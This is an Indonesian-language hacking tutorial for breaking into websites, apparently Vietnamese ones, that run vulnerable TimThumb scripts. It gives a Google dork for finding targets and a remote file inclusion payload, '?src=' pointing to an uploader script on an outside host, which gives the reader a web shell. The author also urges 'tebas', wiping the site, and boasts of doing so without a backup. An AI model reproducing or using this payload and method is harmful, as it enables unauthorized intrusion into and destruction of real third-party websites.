Sebelum Ke Tutorial Nya Kita Harus Siapkan Bahan-bahannya Dulu
Bahan-Bahannya:
1.Dork: inurl:/timthumb.php site:vn
2.Exploit:?src=http://flickr.com.ehpet.net/uploader.php
3.Internet
4.Pc/Laptop
Oke Kita Langsung Ke Tutorialnya Aja..
1.) Dorking Dulu Di Goole Pake Dork Diatas....
2.) Pilih Salah Satu Websitenya
3.) Klik Tombol Ctrl + U Di Keyboard Kalian...
4.) Jika Sudah Klik Tombol Ctrl + U ,Kita Klik Tombol Ctrl + F untuk mencari Kata Timthumb
5.) Kalo Udh Klik Tombol Ctrl + F Keluar Tempat Pencarian Kita ketik:timthumb.php
6.) Kalo Ada Kita Copy Url Nya Contoh:www.target.com/path/timthumb.php Buka Linknya
7.) Nanti Akan Keluar Versi Timthumb Nya...
8.) Versi Timthumb Yang Vuln Adalah Versi 2.0 Kebawah
Seperti Dibawah
9.) Masukkan Exploit Nya Dibelakang Timthumb.php Contoh: www.target.com/path/timthumb.php?src=http://flickr.com.ehpet.net/uploader.php
10.) Jika Sukses Ada Akses Shellnya Di Paling Atas....
11.) Dan Akses Shellnya Deh....Saran Tebas Di Backup Dlu Ya Klo Gk Tegaan...
12.) Karena Gw Gk Tegaan Jdi Gw Lngsung Tebas Tnpa Backup;v'
Sekian Tutorial Dari Gw..
Semoga Bermanfaat
